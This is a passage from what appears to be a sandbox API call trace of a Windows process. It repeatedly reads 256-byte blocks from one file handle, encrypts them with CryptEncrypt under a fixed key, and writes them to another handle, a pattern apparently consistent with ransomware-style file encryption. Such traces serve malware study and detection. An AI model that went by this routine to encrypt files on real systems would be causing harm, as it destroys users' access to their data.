lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.057] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.057] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.057] GetLastError () returned 0x0 [0168.057] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.057] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.057] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.057] GetLastError () returned 0x0 [0168.057] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.057] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.057] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.057] GetLastError () returned 0x0 [0168.057] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.057] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.057] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.057] GetLastError () returned 0x0 [0168.058] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.058] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.058] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.058] GetLastError () returned 0x0 [0168.058] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.058] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.058] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.058] GetLastError () returned 0x0 [0168.058] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.058] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.058] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.058] GetLastError () returned 0x0 [0168.058] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.058] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.058] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.058] GetLastError () returned 0x0 [0168.058] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.059] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.059] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.059] GetLastError () returned 0x0 [0168.059] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.059] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.059] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.059] GetLastError () returned 0x0 [0168.059] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.059] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.059] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.059] GetLastError () returned 0x0 [0168.059] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.059] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.059] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.059] GetLastError () returned 0x0 [0168.059] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.059] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.059] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.059] GetLastError () returned 0x0 [0168.059] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.060] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.060] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.060] GetLastError () returned 0x0 [0168.060] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.060] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.060] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.060] GetLastError () returned 0x0 [0168.060] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.060] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.060] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.060] GetLastError () returned 0x0 [0168.060] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.060] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.060] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.060] GetLastError () returned 0x0 [0168.060] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.060] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.060] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.060] GetLastError () returned 0x0 [0168.060] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.061] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.061] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.061] GetLastError () returned 0x0 [0168.061] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.061] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.061] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.061] GetLastError () returned 0x0 [0168.061] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.061] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.061] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.061] GetLastError () returned 0x0 [0168.061] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.061] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.061] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.061] GetLastError () returned 0x0 [0168.061] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.061] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.061] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.062] GetLastError () returned 0x0 [0168.062] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.062] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.062] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.062] GetLastError () returned 0x0 [0168.062] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.062] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.062] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.062] GetLastError () returned 0x0 [0168.062] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.062] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.062] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.062] GetLastError () returned 0x0 [0168.062] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.062] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.062] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.062] GetLastError () returned 0x0 [0168.062] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.062] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.063] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.063] GetLastError () returned 0x0 [0168.063] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.063] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.063] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.063] GetLastError () returned 0x0 [0168.063] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.063] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.063] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.063] GetLastError () returned 0x0 [0168.063] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.063] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.063] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.063] GetLastError () returned 0x0 [0168.063] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.063] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.063] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.063] GetLastError () returned 0x0 [0168.063] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: 